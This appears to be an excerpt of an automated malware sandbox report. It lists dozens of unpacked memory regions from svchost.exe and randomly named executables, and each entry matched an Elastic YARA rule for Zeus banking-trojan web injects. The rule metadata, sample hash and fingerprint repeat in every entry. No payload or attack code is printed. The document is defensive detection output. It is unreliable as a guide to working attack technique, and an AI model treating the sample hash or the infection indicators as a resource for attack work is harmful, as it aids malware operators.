Source: 7.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.fe2000.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.13.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.886c00.3.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.2.svchost.exe.2c70000.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.56.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.886000.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 11.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.3270000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 24.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.2560000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.34.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.30.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.20.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.36.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.28.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 11.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.2ea2000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.33.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.45.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.21.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.f380000.11.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.881000.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.14.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.38.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.20.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.886000.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 24.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.24f2000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 39.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.d30000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 39.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.cd2000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.40.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.29.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.52.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.36.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 33.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.b00000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.45.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.881000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0.2.UMwpXhA46R.exe.406400.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 16.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.2af2000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 39.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.cd2000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.56.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.886000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.8.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.2.svchost.exe.2cd1c00.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.12.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 30.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.27a0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
